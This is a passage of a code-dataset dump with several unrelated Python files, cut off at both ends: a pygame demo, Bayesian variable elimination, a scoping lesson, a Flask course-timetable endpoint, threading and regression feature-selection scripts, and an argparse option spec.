48\nhoehe = 48\n\nlinkeWand = pygame.draw.rect(screen, (0,0,0), (0,0,48,624),0)\nrechteWand = pygame.draw.rect(screen, (0,0,0), (816,0,-48,624),0)\nobenWand = pygame.draw.rect(screen, (0,0,0), (0,0,816,48),0)\nuntenWand = pygame.draw.rect(screen,(0,0,0),(0,624,816,-48),0)\n\ndef zeichnen():\n screen.blit(hintergrund, (0, 0))\n pygame.draw.rect(screen, (255, 0, 0), (x, y, breite, hoehe))\n pygame.display.update()\n\ngo = True\n\nwhile go:\n for event in pygame.event.get():\n if event.type == pygame.QUIT: sys.exit()\n\n spielerRechteck = pygame.Rect(x, y, 48, 48)\n\n gedrueckt = pygame.key.get_pressed()\n\n if gedrueckt[pygame.K_UP] and not spielerRechteck.colliderect(obenWand):\n y -= geschw\n if gedrueckt[pygame.K_RIGHT] and not spielerRechteck.colliderect(rechteWand):\n x += geschw\n if gedrueckt[pygame.K_DOWN] and not spielerRechteck.colliderect(untenWand):\n y += geschw\n if gedrueckt[pygame.K_LEFT] and not spielerRechteck.colliderect(linkeWand):\n x -= geschw\n\n zeichnen()\n clock.tick(60)","sub_path":"Pygame/Beleg/alt/ver2.py","file_name":"ver2.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"519117164","text":"# Copyright (c) 2013 Víctor J. 
Marín \n#\n# Permission is hereby granted, free of charge, to any person\n# obtaining a copy of this software and associated documentation\n# files (the \"Software\"), to deal in the Software without\n# restriction, including without limitation the rights to use,\n# copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following\n# conditions:\n\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES\n# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND\n# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\n# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\n# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR\n# OTHER DEALINGS IN THE SOFTWARE.\n\nimport copy\nimport itertools\nimport utils.utils as utils\n\nfrom inference.Factor import Factor\n\n\n# Get the hidden variables\ndef get_hidden_variables(relevant_factors, query_variable):\n\n    hidden_vars = [copy.copy(factor.factors) for factor in relevant_factors]\n\n    hidden_vars = set(itertools.chain.from_iterable(hidden_vars)) - set([query_variable])\n\n    return hidden_vars\n\n\ndef sum_out(elimination_variable, relevant_factors, mode, eliminated_factors, query_variable):\n\n    appearing_factors = utils.appearing_factors(elimination_variable, relevant_factors)\n\n    if mode == 'verbose':\n\n        print('Processing ' + str(elimination_variable) + '...\\n')\n        print('Factors it appears in: ' + str([str(f) for f in appearing_factors]))\n\n    __get_final_factor(appearing_factors, elimination_variable, relevant_factors, eliminated_factors, query_variable, mode)\n\n\ndef __get_final_factor(appearing_factors, elimination_variable, relevant_factors, eliminated_factors, query_variable, mode):\n\n    while(len(appearing_factors) > 1):\n\n        f1 = appearing_factors.pop(0)\n        if f1 in relevant_factors:\n            relevant_factors.remove(f1)\n            eliminated_factors.append(f1)\n\n        f2 = appearing_factors.pop(0)\n        if f2 in relevant_factors:\n            relevant_factors.remove(f2)\n            eliminated_factors.append(f2)\n\n        new_factor = multiply(f1, f2)\n        appearing_factors.append(new_factor)\n\n    # Final factor resulting from eliminating the variable in question by multiplying the factors it appears in, two at a time.\n    resulting_factor = appearing_factors[0]\n\n    # If the variable appeared in a single factor, remove it from the relevant factors, since it will not have been removed earlier.\n    if resulting_factor in relevant_factors:\n        relevant_factors.remove(resulting_factor)\n\n    # If the variable is not the query variable, group the resulting factor by it.\n    if elimination_variable != query_variable:\n        resulting_factor = __group_factor_by(resulting_factor, elimination_variable)\n\n    # If there is a resulting factor (it is not None) and it is not among the relevant factors, add it to them.\n    if resulting_factor and (resulting_factor not in relevant_factors):\n        relevant_factors.append(resulting_factor)\n\n    if mode == 'verbose':\n        print('Resulting factor: ' + str(resulting_factor))\n        print('\\nCurrent factors: ' + str([str(factor) for factor in relevant_factors]))\n        print('Eliminated factors: ' + str([str(factor) for factor in eliminated_factors]) + '\\n')\n\n\ndef multiply(f1, f2):\n    \"\"\"\n    Returns the product of two factors.\n\n    @type f1: Factor\n    @param f1: First factor.\n\n    @type f2: Factor\n    @param f2: Second factor.\n\n    @rtype: Factor\n    @return: Factor resulting from performing the multiplication.\n    \"\"\"\n    # Get the variables that appear in both factors.\n    f1_vars = copy.copy(f1.factors)\n    f2_vars = copy.copy(f2.factors)\n\n    # Compute the intersection between the variables of both factors.\n    vars_intersection = list(set(f1_vars) & set(f2_vars))\n\n    vars_indexes = [[], []]\n\n    # Find the position that each variable common to both factors occupies in each of them.\n    for var in vars_intersection:\n        vars_indexes[0].append(f1_vars.index(var))\n        vars_indexes[1].append(f2_vars.index(var))\n\n    reversed_indexes = copy.copy(vars_indexes[0])\n    reversed_indexes.sort(reverse = True)\n\n    f1_cpt = f1.cpt\n    f2_cpt = f2.cpt\n\n    new_cpt = {}\n    for k1 in f1_cpt.keys():\n\n        for k2 in f2_cpt.keys():\n\n            # Get the domain values for each variable of the intersection in each entry of the probability table of the first factor.\n            k1_domain_value = []\n            if isinstance(k1, str):\n                k1_domain_value = [k1]\n            else:\n                for var_index_f1 in vars_indexes[0]:\n                    k1_domain_value.append(k1[var_index_f1])\n\n            # Get the domain values for each variable of the intersection in each entry of the probability table of the second factor.\n            k2_domain_value = []\n            if isinstance(k2, str):\n                k2_domain_value = [k2]\n            else:\n                for var_index_f2 in vars_indexes[1]:\n                    k2_domain_value.append(k2[var_index_f2])\n\n            # If the domain values match, multiply.\n            if k1_domain_value == k2_domain_value:\n\n                new_key = list(k1)\n\n                if isinstance(k1, str):\n                    new_key = []\n                else:\n                    for var_index_f1 in reversed_indexes:\n                        new_key.pop(var_index_f1)\n\n                if isinstance(k2, str):\n                    new_key += list([k2])\n                else:\n                    new_key += list(k2)\n\n                new_key = utils.proper_key(new_key)\n                new_cpt[new_key] = f1_cpt[k1] * f2_cpt[k2]\n\n    new_factors = f1_vars\n    for var_index_f1 in reversed_indexes:\n        new_factors.pop(var_index_f1)\n\n    new_factors += f2_vars\n    new_factor = Factor(new_factors, new_cpt, False)\n\n    return new_factor\n\n\ndef __group_factor_by(factor, variable):\n    \"\"\"\n    Groups the factor by the desired variable.\n\n    @type factor: Factor\n    @param factor: Factor to group.\n\n    @type variable: Node\n    @param variable: Variable to group by.\n\n    @rtype: Factor\n    @return: Factor resulting from grouping the variable.\n    \"\"\"\n    new_factor = None\n\n    if len(factor.factors) > 1:\n        var_position = factor.factors.index(variable)\n\n        new_cpt = {}\n\n        keys = copy.copy(list(factor.cpt.keys()))\n\n        while(keys):\n\n            key = keys.pop(0)\n            keys_to_be_grouped = []\n            domain = set(variable.domain) - set([key[var_position]])\n\n            # Generate all the possible variants of key with the domain of the variable being grouped by.\n            for domain_value in domain:\n                k = list(key)\n                k[var_position] = domain_value\n                k = utils.proper_key(k)\n                keys.remove(k)\n                keys_to_be_grouped.append(k)\n\n            # Sum the values of all those tuples.\n            summatory = factor.cpt[key]\n            for key in keys_to_be_grouped:\n                summatory += factor.cpt[key]\n\n            # Update the new CPT.\n            new_key = list(key)\n            new_key.pop(var_position)\n            new_key = utils.proper_key(new_key)\n            new_cpt[new_key] = summatory\n\n        new_factors = [f for f in factor.factors if f != variable]\n        new_factor = Factor(new_factors, new_cpt)\n\n    return new_factor\n","sub_path":"src/inference/algorithms/variable_elimination/sumout.py","file_name":"sumout.py","file_ext":"py","file_size_in_byte":7843,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"505599056","text":"\ndef outer_function():\n    # remove the nonlocal call here to make the code work (and see what the difference is versus global)\n    nonlocal a ## this will result in the inner_function call having nothing to bind to in this nonlocal (but nonglobal) context, and thus will generate an error.\n    a = 20\n    def inner_function():\n        nonlocal a\n        a = 30\n        print('a =', a)\n\n    inner_function()\n    print('a =', a)\na = 10\nouter_function()\nprint('a =', a)\n","sub_path":"Class Notes/w03c08/scoping3.py","file_name":"scoping3.py","file_ext":"py","file_size_in_byte":466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"528289048","text":"import json\nimport logging\n\nfrom flask import Response\nfrom flask import request\n\nfrom plugins_v2._login_v2.login_v2 import login\nfrom . import api\nfrom .config import class_course_table_url, pre_class_course_table_url, NAME, PASSWD\n\n\n@api.route('/GetClassCourseTable', methods=['GET'])\ndef handle_get_course_table():\n    class_name = request.args.get('class', \"\")\n    res = get_class_course_table(class_name)\n    resp = Response(json.dumps(res), mimetype='application/json')\n    return resp\n\n\ndef get_class_course_table(class_name):\n    message = \"OK\"\n    code = 0\n    data = []\n    if len(class_name) < 1:\n        code = -6\n        message = \"Keyword must not be empty\"\n    else:\n        session = login(NAME, PASSWD)\n        if isinstance(session, str):\n            code = -2\n            message = \"Query failed\"\n            logging.warning(\"Global account login failed: %s\" % message)\n        else:\n            post_data = {\n                \"xnm\": \"2019\",\n                \"xqm\": \"12\",\n                \"xqh_id\": \"01\",\n                \"njdm_id\": \"\",\n                \"jg_id\": \"\",\n                \"zyh_id\": \"\",\n                \"zyfx_id\": \"\",\n                \"bh_id\": class_name,\n                \"_search\": \"false\",\n                \"queryModel.showCount\": \"1\",\n            }\n            pre_data = session.post(\"http://222.31.49.139/jwglxt/kbdy/bjkbdy_cxBjkbdyTjkbList.html?gnmkdm=N214505\",\n                                    data=post_data).json()\n            if not pre_data[\"items\"]:\n                code = -6\n                message = \"Invalid class number\"\n            else:\n                post_data = {\n                    \"xnm\": \"2019\",\n                    \"xqm\": \"12\",\n                    \"xqh_id\": \"01\",\n                    \"njdm_id\": \"\",\n                    \"jg_id\": \"\",\n                    \"zyh_id\": \"\",\n                    \"zyfx_id\": \"\",\n                    \"bh_id\": class_name,\n                    \"_search\": \"false\",\n                    \"queryModel.showCount\": \"1\",\n                }\n                pre_data = session.post(pre_class_course_table_url, data=post_data).json()\n                if not pre_data[\"items\"]:\n                    code = -6\n                    message = \"Invalid class number\"\n                else:\n                    post_data = {\n                        \"xnm\": \"2019\",\n                        \"xqm\": \"12\",\n                        \"xnmc\": \"2019-2020\",\n                        \"xqmmc\": \"2\",\n                        \"xqh_id\": \"01\",\n                        \"njdm_id\": pre_data[\"items\"][0][\"njdm_id\"],\n                        \"zyh_id\": pre_data[\"items\"][0][\"zyh_id\"],\n                        \"bh_id\": class_name,\n                        \"tjkbzdm\": \"1\",\n                        \"tjkbzxsdm\": \"0\",\n                        # \"zxszjjs\": True\n                    }\n\n                    course_table = session.post(class_course_table_url, data=post_data).json()\n                    tables = []\n                    cnt = 0\n                    name_dict = {}\n                    for index, table in enumerate(course_table[\"kbList\"]):\n                        spited = table[\"jcor\"].split(\"-\")\n                        if table[\"kcmc\"] not in name_dict:\n                            name_dict[table[\"kcmc\"]] = cnt\n                            cnt += 1\n                        tables.append({\n                            # \"Course_Number\": table[\"kch_id\"],\n                            \"Course_Name\": table[\"kcmc\"],\n                            # \"Course_Credit\": table[\"xf\"],\n                            # \"Course_Test_Type\": table[\"khfsmc\"],\n                            \"Course_Teacher\": table.get(\"xm\"),\n                            \"Course_Week\": table[\"zcd\"],\n                            \"Course_Color\": name_dict[table[\"kcmc\"]],\n                            
\"Course_Time\": table[\"xqj\"],\n \"Course_Start\": spited[0],\n \"Course_Length\": int(spited[1]) - int(spited[0]) + 1,\n \"Course_Building\": table.get(\"xqmc\"),\n \"Course_Classroom\": table.get(\"cdmc\")\n })\n # for d in course_table[\"sjkList\"]:\n # tables.append({\n # \"Course_Name\": d[\"sjkcgs\"]\n # })\n # TODO 兼容现有客户端\n data = tables\n return {\"message\": message, \"code\": code, \"data\": data}\n","sub_path":"plugins_v2/get_class_course_table_v2/get_class_course_table_v2.py","file_name":"get_class_course_table_v2.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"68772293","text":"inp=int(input())\narray=list(map(int,input().split()))\nfor i in range(0,len(array)):\n if(i==array[i]):\n print(array[i],end=\" \")\ncount=0\nfor i in range(0,len(array)): \n if (i!=array[i]):\n count+=1\nif(count==len(array)):\n print(-1)\n","sub_path":"valequalindex.py","file_name":"valequalindex.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"215895955","text":"import threading\nimport time\nclass Counter():\n def __init__(self):\n self.count = 0\n def increment(self):\n self.count += 1\n def get_count(self):\n return self.count\n\ndef count_up_100000(counter):\n for i in range(100000):\n counter.increment()\n\n# counter = Counter()\n# initial_count = counter.get_count()\n# count_up_100000(counter)\n# final_count = counter.get_count()\n# print(final_count)\n\n\ncounter = Counter()\n#count_thread = threading.Thread(target=count_up_100000, args=[counter])\ncount_thread = threading.Thread(target=count_up_100000, args=(counter,))\ncount_thread.start()\nmid_join = counter.get_count()\ncount_thread.join()\nafter_join = counter.get_count()\nprint(\"mid_join _{}\".format(mid_join))\nprint(after_join)\n#\n# mid_join _24695\n# 100000","sub_path":"Py_op/Mul_process/Mul_process_thread/mul_process_log10.py","file_name":"mul_process_log10.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"484861145","text":"\nimport pandas\nimport sklearn\nimport itertools\nimport numpy\nfrom scipy.stats import pearsonr,spearmanr\nfrom sklearn.metrics.regression import mean_absolute_error,mean_squared_error\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.preprocessing import StandardScaler\nfrom ast import literal_eval\n# from read_config import read_conf\n\n\n\n\n\nimport pandas\nimport itertools\nimport numpy\nfrom scipy.stats import pearsonr,spearmanr\nfrom sklearn.metrics.regression import mean_absolute_error,mean_squared_error\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.preprocessing import StandardScaler\n\n\n\n\n\ndef MAE(Y1,Y2):\n return mean_absolute_error(Y1,Y2)\ndef MSE(Y1, Y2):\n return mean_squared_error(Y1, Y2)\ndef SPC(y_true, y_pred):\n corr , _ = spearmanr(y_true,y_pred)\n return corr\ndef PNC(y_true, y_pred):\n corr , _ = pearsonr(y_true,y_pred)\n return corr\n\n\n\n\ndef normalize_df(df,features,target_col,scaler):\n X = df.loc[:,features].values\n Y = df.loc[:,target_col].values\n X = scaler.transform(X)\n out_df = pandas.DataFrame(X,index = df.index, columns=features)\n out_df[target_col]= Y\n return out_df\n\n\n\ndef normalize_train_test(training_set_df , test_set_df, feature_cols, target_col):\n train_set_X = training_set_df.loc[ :, feature_cols].values\n scaler = 
StandardScaler()\n    scaler.fit(train_set_X)\n    test_set_norm_df = normalize_df(test_set_df,feature_cols,target_col,scaler)\n    training_set_norm_df = normalize_df(training_set_df,feature_cols,target_col,scaler)\n    return training_set_norm_df, test_set_norm_df\n\n\n\n\n\n\ndef avg_cross_validation_score(model,scorer,trainfolds_dfs,testfolds_dfs,feature_set,target_col_name):\n    scores = [None]*len(testfolds_dfs)\n    for i in range(len(testfolds_dfs)):\n        train_X = trainfolds_dfs[i].loc[:,feature_set].values\n        train_Y = trainfolds_dfs[i].loc[:,target_col_name].values\n        test_X = testfolds_dfs[i].loc[:,feature_set].values\n        test_Y = testfolds_dfs[i].loc[:,target_col_name].values\n        model.fit(train_X,train_Y)\n        test_pred = model.predict(test_X)\n        scores[i] = scorer(test_pred,test_Y)\n    # if float(\"nan\") in scores:\n    #     print(\"None seen in scores\")\n    avg_score = numpy.mean(scores)\n    if numpy.isnan(avg_score):\n        print(\"None seen in scores\")\n    # print(\"cross validation on \",feature_set)\n    # print(\"scores: \",scores)\n    return avg_score\n\n\n\ndef get_resutls_column(model,trainfolds_dfs,testfolds_dfs,train_set,test_set,feature_set,target_col_name):\n    MSEs = [None]*len(testfolds_dfs)\n    MAEs = [None]*len(testfolds_dfs)\n    SPs = [None]*len(testfolds_dfs)\n    PNs = [None]*len(testfolds_dfs)\n    for i in range(len(testfolds_dfs)):\n        train_X = trainfolds_dfs[i].loc[:,feature_set].values\n        train_Y = trainfolds_dfs[i].loc[:,target_col_name].values\n        test_X = testfolds_dfs[i].loc[:,feature_set].values\n        test_Y = testfolds_dfs[i].loc[:,target_col_name].values\n        model.fit(train_X,train_Y)\n        test_pred = model.predict(test_X)\n        MAEs[i] = MAE(test_pred,test_Y)\n        MSEs[i] = MSE(test_pred, test_Y)\n        SPs[i] = SPC(test_pred, test_Y)\n        PNs[i] = PNC(test_pred, test_Y)\n\n    train_cvavg_MAE = numpy.mean(MAEs)\n    train_cvavg_MSE = numpy.mean(MSEs)\n    train_cvavg_PN = numpy.mean(PNs)\n    train_cvavg_SP = numpy.mean(SPs)\n\n\n    test_Y = test_set.loc[:, target_col_name].values\n    test_X = test_set.loc[:, feature_set].values\n    train_X = train_set.loc[:, feature_set].values\n    train_Y = train_set.loc[:, target_col_name].values\n\n    model.fit(train_X, train_Y)\n    test_pred = model.predict(test_X)\n\n    testset_pn, _ = pearsonr(test_Y, test_pred)\n    testset_sp, _ = spearmanr(test_Y, test_pred)\n    testset_mae = mean_absolute_error(test_Y, test_pred)\n    testset_mse = mean_squared_error(test_Y, test_pred)\n\n    column = [testset_mae, testset_mse,testset_pn, testset_sp, train_cvavg_MAE, train_cvavg_MSE, train_cvavg_PN, train_cvavg_SP ,feature_set,len(feature_set)]\n    column += list(test_pred)\n    return column\n\n\ndef wrapper_optimize(model,eval_criterion,input_sorted_features,train_fold_dfs,test_fold_dfs,target_column_name):\n    # input of the wrapper-based method is\n    # a pair: an evaluation method and the threshold of increase in that score\n    # a threshold for the correlation of features which pass the filter, or in other words the features to consider\n    # a threshold for the mutual correlation between features to be acceptable\n    # output of the wrapper-based method is\n    # the list of best features\n    # it can also print the progress of the wrapper-based search\n    eval_func, eval_th , maximize = eval_criterion\n    current_best_score = float(\"inf\")\n    current_features = []\n    if maximize:\n        current_best_score = - current_best_score\n    for feature in input_sorted_features:\n        features_including_new = current_features+[feature]\n        #find the results of cross validation for that set of features\n        new_score = 
avg_cross_validation_score(model,globals()[eval_func],train_fold_dfs,test_fold_dfs,features_including_new,target_column_name)\n        if maximize:\n            if new_score - current_best_score >= eval_th:\n                current_best_score = new_score\n                current_features = features_including_new\n        else:\n            if current_best_score - new_score >= eval_th:\n                current_best_score = new_score\n                current_features = features_including_new\n    return current_features, current_best_score\n\n\n\n\ndef filter_and_sort_features (dataset,input_features,target_col,filter_correlation_threshold,mutual_correlation_threshold):\n    #this function is supposed to get a dataset (examples in rows and features in columns)\n    #it outputs a list of noncorrelated (corr < mutual_correlation_threshold) features, sorted by the absolute\n    #value of their correlation with the target, keeping only those with correlation > filter_correlation_threshold\n    filtered_features = []\n    scores = []\n    for f in input_features:\n        corr, _ = spearmanr(dataset.loc[:, f].values, dataset.loc[:, target_col].values)\n        score = abs(corr)\n        if score>filter_correlation_threshold:\n            filtered_features.append(f)\n            scores.append(score)\n    scores = numpy.array(scores)\n    sorted_idx = numpy.argsort(scores)[::-1]\n    sorted_features = numpy.array(filtered_features)[sorted_idx]\n    # sorted_scores = scores[sorted_idx]\n\n    accepted_features = []\n    for f in sorted_features:\n        redundant = False\n        new_feat_vals = dataset.loc[:, f].values\n        for ff in accepted_features:\n            accepted_feat_vals = dataset.loc[:, ff].values\n            corr, _ = spearmanr(new_feat_vals,accepted_feat_vals)\n            if abs(corr) > mutual_correlation_threshold:\n                redundant = True\n        if not redundant:\n            accepted_features.append(f)\n\n    return accepted_features\n\n\n\n\n\n\n\n\n\n\n############## read configurations\nimport json\nwith open(\"configurations.json\") as jsonfile:\n    conf = json.load(jsonfile)\ndataset_root_dir = conf[\"dataset_root_dir\"]\nsampling_methods = conf[\"sampling_methods\"]\nsampling_methods = [x+\"_lowdim\" for x in sampling_methods]\ntest_set_path = dataset_root_dir + conf[\"file_locations\"][\"test_set\"]\ntest_folds_relpath = conf[\"file_locations\"][\"test_folds\"]\ntest_folds_path = [dataset_root_dir + relpath for relpath in test_folds_relpath]\n\n\n# sampling_methods = [\"nosampling\"]\nwrapper_opt_step = {}\nmutual_th_ops = {}\nfilt_thresholds ={}\n\nwrapper_opt_step[\"resolution\"] = [(\"SPC\",0.01,True),\n                                  (\"SPC\",0.0075,True),\n                                  (\"SPC\",0.005,True),\n                                  (\"SPC\",0.001,True),\n                                  #(\"PNC\",0.01,True),\n                                  (\"MAE\",0.1,False),\n                                  (\"MAE\",0.05, False),\n                                  (\"MAE\",0.01,False),\n                                  (\"MAE\",0.005, False),\n                                  #(\"MSE\",0.1,False),\n                                  #(\"MWE\",0.05,False),\n                                  #(\"M4E\",0.5,False)\n                                  ]\n\nmutual_th_ops[\"resolution\"] = [0.5,0.7,1]\nfilt_thresholds[\"resolution\"] = [0,0.1,0.2,0.3]\n\n\n\n\n\nwrapper_opt_step[\"rfree\"] = [(\"SPC\",0.01,True),\n                             (\"SPC\",0.0075,True),\n                             (\"SPC\",0.005,True),\n                             (\"SPC\",0.001,True),\n                             #(\"PNC\",0.01,True),\n                             #(\"MAE\",0.1,False),\n                             (\"MAE\",0.05, False),\n                             (\"MAE\",0.01, False),\n                             (\"MAE\",0.005, False),\n\t(\"MAE\",0.001, False),\n                             #(\"MSE\",0.1,False),\n                             #(\"MWE\",0.05,False),\n                             #(\"M4E\",0.5,False)\n                             ]\nmutual_th_ops[\"rfree\"] = [0.5,0.7,1]\nfilt_thresholds[\"rfree\"] = [0,0.1,0.2]\n\n\n\n\n#####################################\n\n\ntest_set_df = pandas.read_csv(test_set_path)\nnum_CV_folds = len(test_folds_path)\n\n\n\nrow_labels = [\"test_MAE\",\n              \"test_MSE\",\n              \"test_pearson\",\n              \"test_spearman\",\n              \"avg_training_MAE\",\n              \"avg_training_MSE\",\n              \"avg_training_pearson\",\n              \"avg_training_spearman\",\n              \"feature_list\",\n              \"num_features\"] + list(test_set_df[\"PDB ID\"].values)\n\n\n\nfor target_var in [\"resolution\",\"rfree\"]:\n    target_col = conf[\"target_col\"][target_var]\n    input_features = conf[\"input_features\"][\"selected\"][target_var]\n    for sampling in sampling_methods:\n        results_df = pandas.DataFrame()\n        results_df[target_col] = [\"\", 
\"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\"] + list(test_set_df[target_col].values)\n results_df.index = row_labels\n\n training_set_path = dataset_root_dir+conf[\"file_locations\"][\"training_set\"][sampling][target_var]\n train_folds_relpath = conf[\"file_locations\"][\"training_folds\"][sampling][target_var]\n train_folds_path = [dataset_root_dir + relpath for relpath in train_folds_relpath]\n test_fold_norm_df = [None] * num_CV_folds\n train_fold_norm_df = [None] * num_CV_folds\n train_set_norm_df, test_set_norm_df = normalize_train_test(pandas.read_csv(training_set_path),\n pandas.read_csv(test_set_path), input_features,\n target_col)\n for i in range(num_CV_folds):\n train_fold_norm_df[i],test_fold_norm_df[i] = normalize_train_test(pandas.read_csv(train_folds_path[i]), pandas.read_csv(test_folds_path[i]), input_features, target_col)\n\n for step, mu, fil in itertools.product(wrapper_opt_step[target_var], mutual_th_ops[target_var], filt_thresholds[target_var]):\n scoring_func = globals()[step[0]]\n step_threshold = step[1]\n sorted_features = filter_and_sort_features(train_set_norm_df, input_features, target_col, fil, mu)\n column_name = \"fil\" + str(fil) + \"_mu\" + str(mu) + \"_\" + scoring_func.__name__ + str(step_threshold)\n if len(sorted_features)>0:\n working_model = LinearRegression()\n sel_features, score = wrapper_optimize(working_model, step, sorted_features, train_fold_norm_df, test_fold_norm_df,\n target_col)\n results_df[column_name] = get_resutls_column(working_model, train_fold_norm_df, test_fold_norm_df, train_set_norm_df,\n test_set_norm_df, sel_features, target_col)\n else:\n results_df[column_name] = [\"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"\", \"0\"] + [\"\"]*(len(row_labels)-10)\n # best_feature\n\n results_df.to_csv(\"results_linreg_\"+target_col+\"_\"+sampling+\".csv\",columns=sorted(results_df.columns))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"modeling_experiments/sklearn/linreg_WBfsel_CVfoldsinfiles_lowdim.py","file_name":"linreg_WBfsel_CVfoldsinfiles_lowdim.py","file_ext":"py","file_size_in_byte":11564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"469840106","text":"# coding: utf-8\nfrom __future__ import absolute_import\nfrom aoikargutil import SPEC_DI_K_EXC\nfrom aoikargutil import SPEC_DI_K_ONE\nfrom aoikargutil import SPEC_DI_K_TWO\n\n#/\nARG_HELP_ON_F = '-h'\nARG_HELP_ON_F2 = '--help'\n\n#/\nARG_EXPR_F = '-e'\nARG_EXPR_K = '3mu6ExF'\nARG_EXPR_V = 'EXPR'\nARG_EXPR_H = 'Expression to evaluate.'\n\n#/\nARG_STMT_F = '-E'\nARG_STMT_K = '2xrXbjs'\nARG_STMT_V = 'STMT'\nARG_STMT_H = 'Statement to execute.'\n\n#/\nARG_FUNC_URI_F = '-f'\nARG_FUNC_URI_K = '3v2mXqJ'\nARG_FUNC_URI_V = 'FUNC_URI'\nARG_FUNC_URI_H = 'Function to call.'\n\n#/\n## |ATP| means argument type parser\nARG_FUNC_ATP_F = '--atp'\nARG_FUNC_ATP_K = '2iDyLEh'\nARG_FUNC_ATP_V = 'FUNC_URI'\nARG_FUNC_ATP_H = \"\"\"Function's argument type parser.\"\"\"\n\n#/\nARG_INSPECT_ON_F = '-i'\nARG_INSPECT_ON_K = '3pDvfIp'\nARG_INSPECT_ON_D = False\nARG_INSPECT_ON_V = '1|0'\nARG_INSPECT_ON_H = \"\"\"Inspect on/off. 
Default is {}.\"\"\"\\\n .format('on' if ARG_INSPECT_ON_D else 'off')\n\n#/\nARG_TIMEIT_ON_F = '-t'\nARG_TIMEIT_ON_K = '3cNEdq0'\nARG_TIMEIT_ON_D = False\nARG_TIMEIT_ON_V = '1|0'\nARG_TIMEIT_ON_H = \"\"\"Timeit on/off. Default is {}.\"\"\"\\\n .format('on' if ARG_TIMEIT_ON_D else 'off')\n\n#/\nARG_TIMEIT_SCODE_F = '-s'\nARG_TIMEIT_SCODE_K = '3r0UfcM'\nARG_TIMEIT_SCODE_D = ''\nARG_TIMEIT_SCODE_V = 'SCODE'\nARG_TIMEIT_SCODE_H = 'Timeit setup code, which is run only once.'\n\n#/\nARG_NUMBER_CNT_F = '-n'\nARG_NUMBER_CNT_K = '2c6Nuwa'\nARG_NUMBER_CNT_D = 10000\nARG_NUMBER_CNT_V = 'N'\nARG_NUMBER_CNT_H = \"\"\"How many times to run for one timer. Default is {}.\"\"\"\\\n .format(ARG_NUMBER_CNT_D)\n\n#/\nARG_REPEAT_CNT_F = '-r'\nARG_REPEAT_CNT_K = '2aTsx48'\nARG_REPEAT_CNT_D = 1\nARG_REPEAT_CNT_V = 'N'\nARG_REPEAT_CNT_H = \"\"\"How many timers to repeat. Default is {}. Result time is the average of all timers'.\"\"\"\\\n .format(ARG_REPEAT_CNT_D)\n\n#/\nARG_TIME_PP_F = '--tpp'\nARG_TIME_PP_K = '3khrJ5Z'\nARG_TIME_PP_D = 9\nARG_TIME_PP_V = 'N'\nARG_TIME_PP_H = \"\"\"Result time's print precision. Default is {}.\"\"\"\\\n .format(ARG_TIME_PP_D)\n\n#/\nARG_RATE_PP_F = '--rpp'\nARG_RATE_PP_K = '2fZi4CO'\nARG_RATE_PP_D = 0\nARG_RATE_PP_V = 'N'\nARG_RATE_PP_H = \"\"\"Result rate's print precision. Default is {}.\"\"\"\\\n .format(ARG_RATE_PP_D)\n\n#/\nARG_DBG_MSG_F = '-V'\nARG_DBG_MSG_K = '3i7rDi1'\nARG_DBG_MSG_D = True\nARG_DBG_MSG_V = '1|0'\nARG_DBG_MSG_H = \"\"\"Debug messages on/off. Default is {}.\"\"\"\\\n .format('on' if ARG_DBG_MSG_D else 'off')\n\n#/\nARG_VER_ON_F = '--ver'\nARG_VER_ON_K = '3akDRjn'\nARG_VER_ON_A = 'store_true'\nARG_VER_ON_H = 'Show version.'\n\n#/\nARG_SPEC = {\n SPEC_DI_K_ONE: (\n ARG_HELP_ON_F,\n ARG_HELP_ON_F2,\n ARG_VER_ON_F,\n #/ 3dfPlme\n ARG_EXPR_F,\n ARG_STMT_F,\n ARG_FUNC_URI_F,\n ),\n SPEC_DI_K_TWO: [\n (ARG_FUNC_ATP_F, ARG_FUNC_URI_F),\n (ARG_TIMEIT_SCODE_F, ARG_TIMEIT_ON_F),\n (ARG_NUMBER_CNT_F, ARG_TIMEIT_ON_F),\n (ARG_REPEAT_CNT_F, ARG_TIMEIT_ON_F),\n (ARG_TIME_PP_F, ARG_TIMEIT_ON_F),\n (ARG_RATE_PP_F, ARG_TIMEIT_ON_F),\n ],\n SPEC_DI_K_EXC: [\n (ARG_INSPECT_ON_F, 